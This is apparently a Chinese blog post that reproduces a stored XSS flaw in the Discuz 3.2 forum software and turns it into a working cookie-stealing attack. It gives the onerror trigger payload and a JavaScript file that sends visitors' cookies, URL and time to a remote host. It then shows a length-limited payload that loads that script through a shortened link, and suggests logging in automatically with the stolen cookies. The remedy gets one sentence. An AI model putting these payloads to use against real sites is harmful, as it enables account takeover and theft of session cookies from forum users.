前言

新的一年马上就开始了,新年打算研究点新的技术方向。由于经常被朋友拉着问，你会不会盗取qq，会不会投票作弊，每次尴尬的说不会时，总感觉自己的无用。
于是 web安全就作为2018年的研究计划吧。

这里写出第一篇漏洞文章。作为一个入门的开端。

参考

本文所提及的漏洞只是我的一个本地复现和更深入的利用。
漏洞来源参考如下文章,感谢作者的提供。
http://www.91ri.org/17317.html

概念说明

• discuz 国内开源的论坛程序。
• xss漏洞 常见的web的漏洞一种。分为三类。其中存储型危害最大。
• cookie 网址通过cookie记录用户的状态。无需密码即可登录。

漏洞证明

image.png

漏洞的复现步骤

1、本地搭建discuz3.2
2、后台开启首页四格

image.png

3、注册账号发帖。标题 输入

<img src=1 onerror=alert(1) > 

4、进入首页,鼠标指向首页四格上刚刚发的帖子。即可复现。

漏洞的原因

1、查看源码

image.png image.png

2、鼠标指向的时候会触发 showTip(); 这个函数会读取 当前元素的tip属性值。也就是会加载 <img src=1 onerror=alert(1) >
3、由于src=1不存在，则会执行 onerror 事件。最终形成xss。

4、更深入的原因是：我们输入的内容是

<img src=1 onerror=alert(1) > 

dz程序在存储的时候也进行了适当的转义。但是 showTip()的内部,调用了 getAttribute函数，该函数 会将属性值解码。导致产生如下代码。

<img src=1 onerror=alert(1) >

最终xss得以产生。

漏洞的解决。

对用户的输入进行更强的过滤。

漏洞的限制以及如何突破

• 需要开启首页四格。
  无法突破。。但是开启首页四格的网站非常多，所以也不算大的限制。
• 标题存储内容长度限制，80个字节。
  该问题导致利用的代码不能直接写入标题，否则无法完成复杂逻辑。可以通过动态加载外部js文件来实现。

突破标题的长度限制

• 编写js文件。

console.log("代码执行");
Date.prototype.Format = function (fmt) { //author: meizz
    var o = {
        "M+": this.getMonth() + 1, //月份
        "d+": this.getDate(), //日
        "h+": this.getHours(), //小时
        "m+": this.getMinutes(), //分
        "s+": this.getSeconds(), //秒
        "q+": Math.floor((this.getMonth() + 3) / 3), //季度
        "S": this.getMilliseconds() //毫秒
    };
    if (/(y+)/.test(fmt)) fmt = fmt.replace(RegExp.$1, (this.getFullYear() + "").substr(4 - RegExp.$1.length));
    for (var k in o)
    if (new RegExp("(" + k + ")").test(fmt)) fmt = fmt.replace(RegExp.$1, (RegExp.$1.length == 1) ? (o[k]) : (("00" + o[k]).substr(("" + o[k]).length)));
    return fmt;
}

var cookie = document.cookie;
var ele = document.createElement("img"); //创建img标签
var time = new  Date().Format("yyyy-MM-dd HH:mm:ss");
ele.src = "http://666coder.aoyait.test/index.html?cookie="+cookie+"&location="+window.location.href+"&time="+time;  //cookie获取
ele.id = "imgs";

以上js 执行的逻辑是：获取用户访问的地址+时间+cookie .然后发送给远程服务器。666coder.aoyait.test

• 压缩js的url长度。这里只能使用 新浪的网址缩短服务。因为它的最短。是t.cn
• 利用代码。长度正好80 (谢天谢地)

<img src=1 onerror=appendscript("http://t.cn/RHJpOh7")>

这里的appendscript() 是discuz 本身提供的函数。没有它，也无法缩短长度。

function appendscript(src, text, reload, charset) {
    var id = hash(src + text);
    if(!reload && in_array(id, evalscripts)) return;
    if(reload && $('#' + id)[0]) {
        $('#' + id)[0].parentNode.removeChild($('#' + id)[0]);
    }

    evalscripts.push(id);
    var scriptNode = document.createElement("script");
    scriptNode.type = "text/javascript";
    scriptNode.id = id;
    scriptNode.charset = charset ? charset : (!document.charset ? document.characterSet : document.charset);
    try {
        if(src) {
            scriptNode.src = src;
            scriptNode.onloadDone = false;
            scriptNode.onload = function () {
                scriptNode.onloadDone = true;
                JSLOADED[src] = 1;
            };
            scriptNode.onreadystatechange = function () {
                if((scriptNode.readyState == 'loaded' || scriptNode.readyState == 'complete') && !scriptNode.onloadDone) {
                    scriptNode.onloadDone = true;
                    JSLOADED[src] = 1;
                }
            };
        } else if(text){
            scriptNode.text = text;
        }
        document.getElementsByTagName('head')[0].appendChild(scriptNode);
    } catch(e) {}
}

• 发帖子。进入首页，鼠标指向。触发漏洞利用代码执行。

image.png

• 用户的cookie 被传递到 另外一台服务器。这里只通过nginx的access.log来记录数据了，可以编写脚本，存储到数据库，然后自动利用cookie进行登录等其他操作。

image.png

漏洞的后果

• 账号被盗
• 论坛帖子/用户被恶意删除
• ......